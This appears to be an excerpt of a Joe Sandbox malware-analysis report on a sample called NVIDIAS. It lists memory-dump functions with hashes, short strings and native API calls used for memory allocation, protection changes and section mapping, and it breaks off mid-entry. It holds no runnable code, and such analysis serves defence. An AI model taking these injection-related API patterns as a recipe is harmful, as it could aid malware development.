Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: H97
API String ID: 0-463401740
Opcode ID: 5fac3a04395894e6290349c732b57b1c3e1090b9f00b5b35b9251ae4f4f6930a
Instruction ID: e7ced7315468cce365be63a2e203bd6e820a4592e8e14502e457015a370b2205
Opcode Fuzzy Hash: 5fac3a04395894e6290349c732b57b1c3e1090b9f00b5b35b9251ae4f4f6930a
Instruction Fuzzy Hash: A3F21976A016198FDB58CF59CC94A9DB7B3BBC8310F29869AD849E7351DB30DD828F40

Function 033ABED0 Relevance: 2.9, Strings: 2, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"L%, xrefs: 033AC2EB
)?%P, xrefs: 033AC342

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: "L%$)?%P
API String ID: 0-2530928089
Opcode ID: 15ede54413537b1ba337c18c55ebae7f3a282eed994d7623fabd2c6972664825
Instruction ID: 6ea1e652962bd6c5ed7743877621a80438273ea60740dc0375b837fc9b40c301
Opcode Fuzzy Hash: 15ede54413537b1ba337c18c55ebae7f3a282eed994d7623fabd2c6972664825
Instruction Fuzzy Hash: 84D11936B006244B8B19EE7D4C9423DA5D7EFC966030D45BEE807EB399DE60CC4A47D5

Function 0830BE38 Relevance: 2.9, Strings: 2, Instructions: 422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

;M, xrefs: 0830C3C7
.&&, xrefs: 0830BF9B

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: .&&$;M
API String ID: 0-1523854721
Opcode ID: 2861d5619243a6751dced060aeda23284cd98bb5651babbefcc74dd150238d4f
Instruction ID: 33d04ab39bd6f4a464dcd0e7ef8b4823313eeec6cb26fbc91f978feef09b9244
Opcode Fuzzy Hash: 2861d5619243a6751dced060aeda23284cd98bb5651babbefcc74dd150238d4f
Instruction Fuzzy Hash: 86F1A132E102258BDB14DFA9C89099EF7F6BB88350756866AD809EB750DB31DC56CFC0

Function 0830CF38 Relevance: 2.9, Strings: 2, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7>*9, xrefs: 0830D468
4<Q, xrefs: 0830D225

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: 4<Q$7>*9
API String ID: 0-12894886
Opcode ID: 14a3e57a8dac9c42597ae58ef866ec1502cded0bc3a12da55ba566d9fce73dbd
Instruction ID: 50c48c030c8cf531f172c81729e8c0f701704c137878df9463318374358f14a0
Opcode Fuzzy Hash: 14a3e57a8dac9c42597ae58ef866ec1502cded0bc3a12da55ba566d9fce73dbd
Instruction Fuzzy Hash: 2BF15F36E012148FDB14CFACC494999B7F6AB88350B1AC65ADC59EB391DB31EC46CF90

Function 033A96D0 Relevance: 2.9, Strings: 2, Instructions: 387
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d8, xrefs: 033A99EF
"n', xrefs: 033A9998

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: d8$"n'
API String ID: 0-122169730
Opcode ID: d1424fd06ccff4bfd13d8a9e4e7488b6969b43bb5b6ac2156744f77902efc505
Instruction ID: ed35b3f4a77f21ed045783ee863fb32a1e8bfcf583ea8ef423d528e75a5d141c
Opcode Fuzzy Hash: d1424fd06ccff4bfd13d8a9e4e7488b6969b43bb5b6ac2156744f77902efc505
Instruction Fuzzy Hash: 81D18A75B007098FCB18DFA9C8D4A9DB7F6EF89200B698169E509EF365DB759C06CB00

Function 03531B10 Relevance: 2.8, Strings: 2, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(P:r, xrefs: 03531D04
(Y/v, xrefs: 03531B99

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID:
String ID: (P:r$(Y/v
API String ID: 0-1496278603
Opcode ID: abfcf14d1da8f15fc0c3c9a38b328ac0380ee6e98afab213030d8653273b5b0f
Instruction ID: 39d4f2d9f0cee841f593851b3ea9c9edb7156d9930d671c0ed515c93c089e742
Opcode Fuzzy Hash: abfcf14d1da8f15fc0c3c9a38b328ac0380ee6e98afab213030d8653273b5b0f
Instruction Fuzzy Hash: 88A13672F006258FCB18EF78D89496EBBB2BF8521071A85BAD805EB360DB719C01C7D0

Function 05D497E8 Relevance: 1.9, Strings: 1, Instructions: 619
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Cr7m^, xrefs: 05D49BFF

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: Cr7m^
API String ID: 0-3967420356
Opcode ID: 188d32cf5f8c9cc15b4b9d727fbb275104b365f47fc702cfe29ec148e0f7759f
Instruction ID: 160043c0f9764b4831aa9a8bd9999d1f6948b46c4b2c774174e25de8b98e319d
Opcode Fuzzy Hash: 188d32cf5f8c9cc15b4b9d727fbb275104b365f47fc702cfe29ec148e0f7759f
Instruction Fuzzy Hash: 1122C436B002159FCB14DF69D8A09AEB7F6FB88350759816AD80AEB351DB35DC46CBC0

Function 08305E13 Relevance: 1.8, Strings: 1, Instructions: 523COMMON

Download Yara Rule

Strings

6Q-j, xrefs: 083061A7

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: 6Q-j
API String ID: 0-339209807
Opcode ID: 7070dc8de683e569a2952889550ca1a9b4383d7d90dbed349d8026d1afe08807
Instruction ID: db3a2525e275fe290d1eb67a88f7fecac073adc0501c62eb92b9b41217f4bad0
Opcode Fuzzy Hash: 7070dc8de683e569a2952889550ca1a9b4383d7d90dbed349d8026d1afe08807
Instruction Fuzzy Hash: 7C226E76E112288FCB14CF68C995699BBF2BF88210F1985AADC09FB355DB349D45CF80

Function 05D4F030 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

l87t, xrefs: 05D4F131

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: l87t
API String ID: 0-3181590174
Opcode ID: e78a708725e616dd6af6af70b2a73315c247e4ea06ad08f7f578406a922a4f22
Instruction ID: 00ec17010533e8c84e2ea28f74c4caf7eda8217d89348a4871a0b8b912d9850d
Opcode Fuzzy Hash: e78a708725e616dd6af6af70b2a73315c247e4ea06ad08f7f578406a922a4f22
Instruction Fuzzy Hash: 2002B336F101269FC718DF68C89496AB7E7BB84250716856ADC0AEB351EB35EC46CFC0

Function 03533EBF Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03533F69

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: fc8eaf0e27ca7c62e175cc12ab82373bdc0f34175cd7e019806580e979f13dd7
Instruction ID: 400829ed0935ad2fcc1a8bd27d8dba2fda6819e08e6bb85ec3265c43706fc667
Opcode Fuzzy Hash: fc8eaf0e27ca7c62e175cc12ab82373bdc0f34175cd7e019806580e979f13dd7
Instruction Fuzzy Hash: EF3152B5D053899FCB11CFAAD8807DEFFF0BF49210F14886AE418A7261C3789905CBA1

Function 03534578 Relevance: 1.6, APIs: 1, Instructions: 72nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 0353461E

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 8321aa89e0cbf8e0d9c74edc8acb4c27de0f085791e42a9c4f1282252762cd0e
Instruction ID: db585d3c38f9e0672371c0a4f1deb3cd28b8f16ba5291740333aa648a6c4a888
Opcode Fuzzy Hash: 8321aa89e0cbf8e0d9c74edc8acb4c27de0f085791e42a9c4f1282252762cd0e
Instruction Fuzzy Hash: 3E31E4B5D01249AFDF10DFAAD884ADEBBF5FF4C224F14841AE918A3220C7359950CFA5

Function 03534580 Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 0353461E

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: abb65b086e938fa9f3d454d749e09f78b597f70b4e6c1bd883610df14e52aac7
Instruction ID: 69271c1dd6481c75551ba3b06ad11f60dcc29615ff067b0be410587d409372d1
Opcode Fuzzy Hash: abb65b086e938fa9f3d454d749e09f78b597f70b4e6c1bd883610df14e52aac7
Instruction Fuzzy Hash: E931E0B5D00249AFDF10DFAAD884ADEBBF5FF4C224F14841AE918A3220C7359950CFA4

Function 035343D0 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03534464

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 362bb7089041fde28abede44ee10a6ef132a40b4fed727e7e1e67af1cc0c5da3
Instruction ID: 940a7be31ee71c8ef13c301b4910c8ac3d3ce4eca34ba5b27ac86f2eea9e871f
Opcode Fuzzy Hash: 362bb7089041fde28abede44ee10a6ef132a40b4fed727e7e1e67af1cc0c5da3
Instruction Fuzzy Hash: 0F2124B1D01249AFDB10DFAAD980ADEFBB4FF08310F24852AE518A3210D3759955CFA1

Function 035343D8 Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03534464

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: 2716ffb918b0d4ee97c8e044ba2d174702b2a0b929074f5007fdd205d381a870
Instruction ID: 0db42fab9dd7168d55ab42ed00504d4e100cf97ea7827efd52b115ff7e02168d
Opcode Fuzzy Hash: 2716ffb918b0d4ee97c8e044ba2d174702b2a0b929074f5007fdd205d381a870
Instruction Fuzzy Hash: AF2103B1D0124DAFDB00DFAAD880ADEFBB5FF48310F10842AE918A3210C7759954CFA1

Function 035342F9 Relevance: 1.6, APIs: 1, Instructions: 64filenativeCOMMON

Download Yara Rule

APIs

NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03534389

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: FileOpen
String ID:
API String ID: 2669468079-0
Opcode ID: 8e5e690fb4d4f1baa87e84c798186e3d85572f3fa39f8b785a895fa30f8eb057
Instruction ID: 09753a97442b9bc51524e83bc54634815383c4be205a8d51f7545d43321afac6
Opcode Fuzzy Hash: 8e5e690fb4d4f1baa87e84c798186e3d85572f3fa39f8b785a895fa30f8eb057
Instruction Fuzzy Hash: F32103B1D01249AFDB00DFAAD984BDEFBB5FF48210F50852AE918B7210C7759954CBA1

Function 03533FB0 Relevance: 1.6, APIs: 1, Instructions: 64memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0353403B

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 67fb803b73f26ce7467094a8c0ef4f257d3d36b8de7107a36b564d1cc07001db
Instruction ID: 697478a224e9594b2964be593c0edf3864a31b7c859921b751216251d6274b11
Opcode Fuzzy Hash: 67fb803b73f26ce7467094a8c0ef4f257d3d36b8de7107a36b564d1cc07001db
Instruction Fuzzy Hash: 7E2134B1E002499FDB10DFAAD884ADEFBF5FF88310F10842AE518A7250C7359555CBA1

Function 03534300 Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON

Download Yara Rule

APIs

NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03534389

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: FileOpen
String ID:
API String ID: 2669468079-0
Opcode ID: e4f03152a93a60b2055d0c19f6fea99962cec878b958cd3d21fef701b29576a4
Instruction ID: 713afd5abb4b14ee8a2df740617ce34d769d7195a2f30beceb9438a89419a9b3
Opcode Fuzzy Hash: e4f03152a93a60b2055d0c19f6fea99962cec878b958cd3d21fef701b29576a4
Instruction Fuzzy Hash: 532114B1D0124DAFDB00DFAAD884ADEFBF4FF48310F50842AE518A3210C7759954CBA1

Function 03534731 Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON

Download Yara Rule

APIs

NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 035347BE

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: ControlDeviceFile
String ID:
API String ID: 3512290074-0
Opcode ID: f8e6f23ae89cb83e19c15ab3edfdf32260053418a90cb83a7a508c687072a750
Instruction ID: 585b91878907408e0946f3c141a255e8df1c0add6e689649aec45d782d90d912
Opcode Fuzzy Hash: f8e6f23ae89cb83e19c15ab3edfdf32260053418a90cb83a7a508c687072a750
Instruction Fuzzy Hash: 7F2136B19002499FDF10DFAAD884ADEFBF1FF48314F14841AE918A3210C7399955CFA1

Function 03533EE0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03533F69

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a573c62dc28bc9c28edeada7690f01fc33c24387b4edc5d29485570d3984eccb
Instruction ID: 117fe0aa3e85e73f4e09f9439b510073d6a6f873c0d281f797d3413de047d309
Opcode Fuzzy Hash: a573c62dc28bc9c28edeada7690f01fc33c24387b4edc5d29485570d3984eccb
Instruction Fuzzy Hash: 5A2103B1D013499FDB10DFAAD880ADEFBF5FF48310F60842AE419A3250C775A900CBA1

Function 03534738 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON

Download Yara Rule

APIs

NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 035347BE

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: ControlDeviceFile
String ID:
API String ID: 3512290074-0
Opcode ID: d01f5f00d38a9e8cbb6089806060e7da4e38460a1bf8d8690d7571e30c1a3636
Instruction ID: 318c8e9389d115a9a195619c44beace0a269e1598f46db3002cf8b3fa2ad69d0
Opcode Fuzzy Hash: d01f5f00d38a9e8cbb6089806060e7da4e38460a1bf8d8690d7571e30c1a3636
Instruction Fuzzy Hash: FE2137B19002499FDF10DFAAD884ADEFBF5FF48314F148419E919A3210C7759955CFA1

Function 03533FB8 Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0353403B

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6c9d51be4c5c91a5ea4b9f4273e889639ca1e89f01c8e43dc6718f16013c17c9
Instruction ID: 3092f60a32819c189b779f2295a714f88755cba9b94b03fda88ac719f6117d71
Opcode Fuzzy Hash: 6c9d51be4c5c91a5ea4b9f4273e889639ca1e89f01c8e43dc6718f16013c17c9
Instruction Fuzzy Hash: 192120B1D003499FDB10DFAAD884ADEFBF5FF48210F50882AE919A7250C775A954CBA1

Function 03534669 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 035346E7

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: FileInformationQueryVolume
String ID:
API String ID: 634242254-0
Opcode ID: 2155d713459a17cd05312f8d9e41146181dbe26a4db15afc71a4fd3cb68c2b9f
Instruction ID: 02d6601bcac7f7491cdfe3056c24d4115121a7d9820b36ec527bdf287f523fd7
Opcode Fuzzy Hash: 2155d713459a17cd05312f8d9e41146181dbe26a4db15afc71a4fd3cb68c2b9f
Instruction Fuzzy Hash: 022113B1D002499FDB10DFAAD884BEEFBF5BF88310F14881AD459A7250C778A944CFA1

Function 03534670 Relevance: 1.6, APIs: 1, Instructions: 57filenativeCOMMON

Download Yara Rule

APIs

NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 035346E7

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: FileInformationQueryVolume
String ID:
API String ID: 634242254-0
Opcode ID: e73336d6348e3dc08a1c084eca8aa158baf2e24c2e9ef8ebebe224dddb069e69
Instruction ID: b47f3793bec6518d409f893ca56a0ee993aeed852a8c59d42c85e83e1067bfa0
Opcode Fuzzy Hash: e73336d6348e3dc08a1c084eca8aa158baf2e24c2e9ef8ebebe224dddb069e69
Instruction Fuzzy Hash: E621F4B1D003499FDB10DFAAD884BEEFBF5BF48214F14882AD519A7250C775A944CFA1

Function 08306898 Relevance: 1.6, Strings: 1, Instructions: 303COMMON

Download Yara Rule

Strings

4c, xrefs: 083068E5

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: 4c
API String ID: 0-1137683036
Opcode ID: 7acf21d3708f9d989b12c1e97e301a39d1093e2be1bd5d4fe5af600cc3bc75e8
Instruction ID: 9e94fbdfdf43c3b955ecf868447611ddc161f4bf12d916773de19cd41461ceea
Opcode Fuzzy Hash: 7acf21d3708f9d989b12c1e97e301a39d1093e2be1bd5d4fe5af600cc3bc75e8
Instruction Fuzzy Hash: 04B10F71B003058FC718CFADD8E5699BBB2BFD8210B55816AE409DB786EB70AC56CF40

Function 03533A21 Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 03533A8A

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 231e37b1a35d42b0f88399f0b09ebe383645b60540df701a16acd4a36525876e
Instruction ID: 197ba6b09bc4e0384825a69f3abb8e0f19633b521f9f8450e1822028ebbaf292
Opcode Fuzzy Hash: 231e37b1a35d42b0f88399f0b09ebe383645b60540df701a16acd4a36525876e
Instruction Fuzzy Hash: B71158B5D003498FDB10DFAAD8447EEFBF5AF88224F24881AC419A7650C738A544CFA4

Function 03533A28 Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 03533A8A

Memory Dump Source

Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f57e7c043d8658a0f445277d686d3bb98ab3b52eda75b1fba9b4058c35970d21
Instruction ID: c1f015d01a548dd0ce9742f93fbc5c92db83cefdc9a4c74974c29b7c468ffa2c
Opcode Fuzzy Hash: f57e7c043d8658a0f445277d686d3bb98ab3b52eda75b1fba9b4058c35970d21
Instruction Fuzzy Hash: 1C1136B1D003498FDB10DFAAD8447EEFBF5AB88224F24881AC419A7250C779A944CFA5

Function 05D423B0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vil, xrefs: 05D42667

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: \Vil
API String ID: 0-949338265
Opcode ID: b346928a716c4d688ee9f313c72139ab0f8cbd0ca79ad7cb6d9b4aa10376dcae
Instruction ID: d98c31fdd0c2cbf79860b871d650454465972314343a2702ec729c5825bc5326
Opcode Fuzzy Hash: b346928a716c4d688ee9f313c72139ab0f8cbd0ca79ad7cb6d9b4aa10376dcae
Instruction Fuzzy Hash: 34B16E74E00249DFDB14CFA9D8957AEBBF2BF88304F14812AE819A7254EB749845CF81

Function 0731DBC1 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

, xrefs: 0731DCC9

Memory Dump Source

Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-76226702
Opcode ID: 2866f57966b781b0262e30b028fa1210d32529459e340b42d7b7dd380af95d9f
Instruction ID: fa3f74c04385a5fc3e8035d3dadf5cfbfb99b57cbcb7bac527ff6187263416e8
Opcode Fuzzy Hash: 2866f57966b781b0262e30b028fa1210d32529459e340b42d7b7dd380af95d9f
Instruction Fuzzy Hash: 2C91DEB2F102169BDB09DAADD9A15ADB7E6FBC82507058179E80CEB340EB34DD05CBC1

Function 05D42068 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vil, xrefs: 05D422B3

Memory Dump Source

Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd

Similarity

API ID:
String ID: \Vil
API String ID: 0-949338265
Opcode ID: d5a005b7cd5fc6dc86940dc513fdfbe3cd45fca12f60ef68bbd5759c91bf9ef6
Instruction ID: 2f2ec23a189445adc7b6edf04a7ac76f8af26cfe8e46c0c7ce4b03cf0f774d61
Opcode Fuzzy Hash: d5a005b7cd5fc6dc86940dc513fdfbe3cd45fca12f60ef68bbd5759c91bf9ef6
Instruction Fuzzy Hash: 48914974E04209DFDF14CFA9D8857AEBBF2BF88314F14812AE405AB294EB749845CF95

Function 033A9358 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

D!), xrefs: 033A9487

Memory Dump Source

Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd

Similarity

API ID:
String ID: D!)
API String ID: 0-952686769
Opcode ID: db3227e9383d51b28e5f4277fca49ed9ad5cd620352ad166a8e8d77b2a51e818
Instruction ID: 47c4159ea64341e7a31a073201be58ec0337b42fe3f16afd22c9c4333d496049
Opcode Fuzzy Hash: db3227e9383d51b28e5f4277fca49ed9ad5cd620352ad166a8e8d77b2a51e818
Instruction Fuzzy Hash: 6171C477F116294F8B14CEADDC9059DF7F2BB8826470A456AE846FB350DA30DC06CB80

Function 0830DB69 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

2f9P, xrefs: 0830DDAA

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID: 2f9P
API String ID: 0-1389593834
Opcode ID: d5e59eb83f55ec30a9754b4c5f3083222771d90b07e4fc85d864e46eb6b38851
Instruction ID: 481a293f8407d7736716ac3e1c71f09e85e312efad4badb2acfb5d3316f8a806
Opcode Fuzzy Hash: d5e59eb83f55ec30a9754b4c5f3083222771d90b07e4fc85d864e46eb6b38851
Instruction Fuzzy Hash: 02814E36B101159FC718DEADD4A09AAB7E6BBC8310719C65AD809EB391DA35EC46CFC0

Function 083093AA Relevance: 1.3, Instructions: 1263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48c30f9de69f32d4db8f6d95b526b3511008683e7f96a92353a939254112d9fe
Instruction ID: b19c6f8f5fe96e255d5cfbcab1fac1381775f6c768adc63559d4529aec690ffa
Opcode Fuzzy Hash: 48c30f9de69f32d4db8f6d95b526b3511008683e7f96a92353a939254112d9fe
Instruction Fuzzy Hash: 7BB27272E105398BCB64CF6CC894699F7B2BB88310F5686A9D809FB354DB749D81CF84

Function 0830DE41 Relevance: 1.2, Instructions: 1186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e359f5e7002dc30fd6cc599642ddc9e4e4b43f25c42913b32d140cf53691b0
Instruction ID: 263842c8836e2b8aa8b9eaf757a29e7d6cc89b0dd2afdc945e6873c0b7092fa2
